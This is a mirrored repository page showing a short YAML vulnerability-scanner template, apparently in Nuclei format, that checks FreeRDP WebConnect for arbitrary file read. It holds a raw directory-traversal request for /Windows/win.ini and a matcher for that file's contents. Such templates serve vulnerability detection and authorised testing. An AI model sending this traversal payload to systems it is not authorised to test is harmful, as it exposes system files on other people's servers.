mirror of
https://github.com/SleepingBag945/dddd.git
synced 2025-06-12 02:05:48 +00:00
17 lines
371 B
YAML
17 lines
371 B
YAML
id: freerdp-webconnect-fileread
|
|
|
|
info:
|
|
name: FreeRDP WebConnect Url 任意文件读取
|
|
author: SleepingBag945
|
|
severity: high
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /../../../../../../../../Windows/win.ini HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains_all(body,"for 16-bit app support","fonts") |